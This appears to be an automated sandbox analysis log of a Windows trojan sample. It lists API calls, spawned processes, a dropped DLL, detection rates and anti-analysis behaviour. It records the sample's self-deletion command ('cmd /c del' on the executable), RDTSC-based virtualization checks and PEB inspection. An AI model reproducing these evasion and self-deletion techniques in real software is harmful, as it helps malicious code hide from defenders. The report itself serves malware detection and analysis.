Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A795F0 NtQueryInformationFile,
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A79520 NtWaitForSingleObject,
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A7AD30 NtSetContextThread,
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A79560 NtWriteFile,
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A796D0 NtCreateKey,
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A79610 NtEnumerateValueKey,
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A79670 NtQueryInformationProcess,
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A79650 NtQueryValueKey,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A79860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A79840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A799A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A795D0 NtClose,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A79910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A79540 NtReadFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A796E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A796D0 NtCreateKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A79660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A79A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A79650 NtQueryValueKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A79780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A79FE0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A79710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A798A0 NtWriteVirtualMemory,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A798F0 NtReadVirtualMemory,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A79820 NtEnumerateKey,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A7B040 NtSuspendThread,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A795F0 NtQueryInformationFile,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A799D0 NtCreateProcessEx,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A79520 NtWaitForSingleObject,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A7AD30 NtSetContextThread,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A79560 NtWriteFile,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A79950 NtQueueApcThread,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A79A80 NtOpenDirectoryObject,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A79A20 NtResumeThread,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A79A00 NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A79610 NtEnumerateValueKey,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A79A10 NtQuerySection,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A79670 NtQueryInformationProcess,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A797A0 NtUnmapViewOfSection,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A7A3B0 NtGetContextThread,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A79730 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A79B00 NtSetValueKey,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A7A710 NtOpenProcessToken,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A79760 NtOpenProcess,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A79770 NtSetInformationFile,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A7A770 NtOpenThread,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_02B78690 NtReadFile,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_02B787C0 NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_02B78710 NtClose,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_02B785E0 NtCreateFile,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_02B7868A NtReadFile,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_02B7870A NtClose,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_02B785DB NtCreateFile,

Source: tM32bSteJD.exe, 00000002.00000003.293621175.000000001B15F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs tM32bSteJD.exe
Source: tM32bSteJD.exe, 00000002.00000003.294502378.000000001AFC6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs tM32bSteJD.exe
Source: tM32bSteJD.exe, 00000004.00000002.377180434.0000000002A80000.00000040.10000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenamewscript.exe` vs tM32bSteJD.exe
Source: tM32bSteJD.exe, 00000004.00000002.376051931.0000000000779000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewscript.exe` vs tM32bSteJD.exe
Source: tM32bSteJD.exe, 00000004.00000002.376434963.0000000000B2F000.00000040.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs tM32bSteJD.exe
Source: tM32bSteJD.exe, 00000004.00000002.376748571.0000000000CBF000.00000040.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs tM32bSteJD.exe

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\nsv6BBF.tmp\pmtkix.dll C8EA1DEC9C0638BC133A1958552A697D6F420CCF7BDE149722A01FE718926C37

Source: tM32bSteJD.exe	Virustotal: Detection: 50%
Source: tM32bSteJD.exe	ReversingLabs: Detection: 41%

Source: C:\Users\user\Desktop\tM32bSteJD.exe

File read: C:\Users\user\Desktop\tM32bSteJD.exe

Jump to behavior

Source: tM32bSteJD.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\tM32bSteJD.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Users\user\Desktop\tM32bSteJD.exe "C:\Users\user\Desktop\tM32bSteJD.exe"
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Process created: C:\Users\user\Desktop\tM32bSteJD.exe "C:\Users\user\Desktop\tM32bSteJD.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\wscript.exe
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\tM32bSteJD.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Process created: C:\Users\user\Desktop\tM32bSteJD.exe "C:\Users\user\Desktop\tM32bSteJD.exe"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\tM32bSteJD.exe"

Source: C:\Users\user\Desktop\tM32bSteJD.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Source: C:\Users\user\Desktop\tM32bSteJD.exe

File created: C:\Users\user\AppData\Local\Temp\nsb6B8F.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@8/4@11/9

Source: C:\Users\user\Desktop\tM32bSteJD.exe

Code function: 2_2_00402012 CoCreateInstance,MultiByteToWideChar,

Source: C:\Users\user\Desktop\tM32bSteJD.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\tM32bSteJD.exe

Code function: 2_2_00404275 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7008:120:WilError_01

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source:	Binary string: wscript.pdbGCTL source: tM32bSteJD.exe, 00000004.00000002.377180434.0000000002A80000.00000040.10000000.00040000.00000000.sdmp, tM32bSteJD.exe, 00000004.00000002.376051931.0000000000779000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: tM32bSteJD.exe, 00000002.00000003.294227609.000000001AEB0000.00000004.00000800.00020000.00000000.sdmp, tM32bSteJD.exe, 00000002.00000003.295672931.000000001B040000.00000004.00000800.00020000.00000000.sdmp, tM32bSteJD.exe, 00000004.00000002.376434963.0000000000B2F000.00000040.00000800.00020000.00000000.sdmp, tM32bSteJD.exe, 00000004.00000002.376208105.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.559028303.0000000004B2F000.00000040.00000800.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.558895131.0000000004A10000.00000040.00000800.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.377444114.0000000004870000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: tM32bSteJD.exe, tM32bSteJD.exe, 00000004.00000002.376434963.0000000000B2F000.00000040.00000800.00020000.00000000.sdmp, tM32bSteJD.exe, 00000004.00000002.376208105.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, wscript.exe, wscript.exe, 0000000B.00000002.559028303.0000000004B2F000.00000040.00000800.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.558895131.0000000004A10000.00000040.00000800.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.377444114.0000000004870000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wscript.pdb source: tM32bSteJD.exe, 00000004.00000002.377180434.0000000002A80000.00000040.10000000.00040000.00000000.sdmp, tM32bSteJD.exe, 00000004.00000002.376051931.0000000000779000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00418006 push ecx; retf
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_0041B822 push eax; ret
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_0041B82B push eax; ret
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_0041B88C push eax; ret
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00416166 push ds; iretd
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_0040BAD8 push ebx; iretd
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_0041A5E5 push ds; ret
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_0041B7D5 push eax; ret
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00419F9A push ebx; iretd
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00419F9C push ds; retf
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A8D0D1 push ecx; ret
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A8D0D1 push ecx; ret
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_02B6BAD8 push ebx; iretd
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_02B7B88C push eax; ret
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_02B7B822 push eax; ret
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_02B7B82B push eax; ret
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_02B78006 push ecx; retf
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_02B76166 push ds; iretd
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_02B79F9C push ds; retf
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_02B79F9A push ebx; iretd
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_02B7B7D5 push eax; ret
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_02B7A5E5 push ds; ret

Source: C:\Users\user\Desktop\tM32bSteJD.exe

Code function: 2_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,

Source: C:\Users\user\Desktop\tM32bSteJD.exe

File created: C:\Users\user\AppData\Local\Temp\nsv6BBF.tmp\pmtkix.dll

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Self deletion via cmd delete

Source: C:\Windows\SysWOW64\wscript.exe	Process created: /c del "C:\Users\user\Desktop\tM32bSteJD.exe"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: /c del "C:\Users\user\Desktop\tM32bSteJD.exe"

Source: C:\Users\user\Desktop\tM32bSteJD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\Desktop\tM32bSteJD.exe

Evasive API call chain: GetPEB, DecisionNodes, ExitProcess

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\tM32bSteJD.exe	RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tM32bSteJD.exe	RDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wscript.exe	RDTSC instruction interceptor: First address: 0000000002B68604 second address: 0000000002B6860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wscript.exe	RDTSC instruction interceptor: First address: 0000000002B6899E second address: 0000000002B689A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Windows\explorer.exe TID: 2920	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\wscript.exe TID: 2060	Thread sleep time: -40000s >= -30000s

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\wscript.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\wscript.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\tM32bSteJD.exe

Code function: 4_2_004088D0 rdtsc

Source: C:\Users\user\Desktop\tM32bSteJD.exe	API coverage: 9.4 %
Source: C:\Windows\SysWOW64\wscript.exe	API coverage: 9.6 %

Source: C:\Users\user\Desktop\tM32bSteJD.exe

Process information queried: ProcessInformation

Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 2_2_00405D7C FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 2_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 2_2_00402630 FindFirstFileA,

Source: C:\Users\user\Desktop\tM32bSteJD.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\tM32bSteJD.exe	API call chain: ExitProcess graph end node

Source: explorer.exe, 00000008.00000000.334867380.00000000089CC000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000008.00000000.349276635.00000000086C9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000008.00000000.349382245.0000000008778000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
Source: explorer.exe, 00000008.00000000.329745570.00000000067C2000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000008.00000000.349276635.00000000086C9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
Source: explorer.exe, 00000008.00000000.329745570.00000000067C2000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
Source: explorer.exe, 00000008.00000000.349276635.00000000086C9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000

Source: C:\Users\user\Desktop\tM32bSteJD.exe

Code function: 2_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,

Source: C:\Users\user\Desktop\tM32bSteJD.exe

Code function: 4_2_004088D0 rdtsc

Source: C:\Users\user\Desktop\tM32bSteJD.exe

Process token adjusted: Debug

Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 2_2_021A0402 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 2_2_021A0616 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 2_2_021A0706 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 2_2_021A0744 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 2_2_021A06C7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A620A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A620A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A620A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A620A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A620A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A620A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A790AF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A6F0BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A6F0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A6F0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A39080 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00AB3884 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00AB3884 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A358EC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00ACB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00ACB8D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00ACB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00ACB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00ACB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00ACB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A6002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A6002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A6002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A6002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A6002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A4B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A4B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A4B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A4B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00B04015 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00B04015 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00AB7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00AB7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00AB7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00B01074 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00AF2073 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A50050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A50050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A661A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A661A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00AB69A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00AB51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00AB51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00AB51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00AB51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A6A185 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A5C182 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A62990 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A3B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A3B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A3B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00AC41E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A54120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A54120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A54120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A54120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A54120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A6513A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A6513A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A39100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A39100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A39100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A3C962 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A3B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A3B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A5B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A5B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A352A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A352A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A352A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A352A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A352A5 mov eax, dword ptr fs:[00000030h]
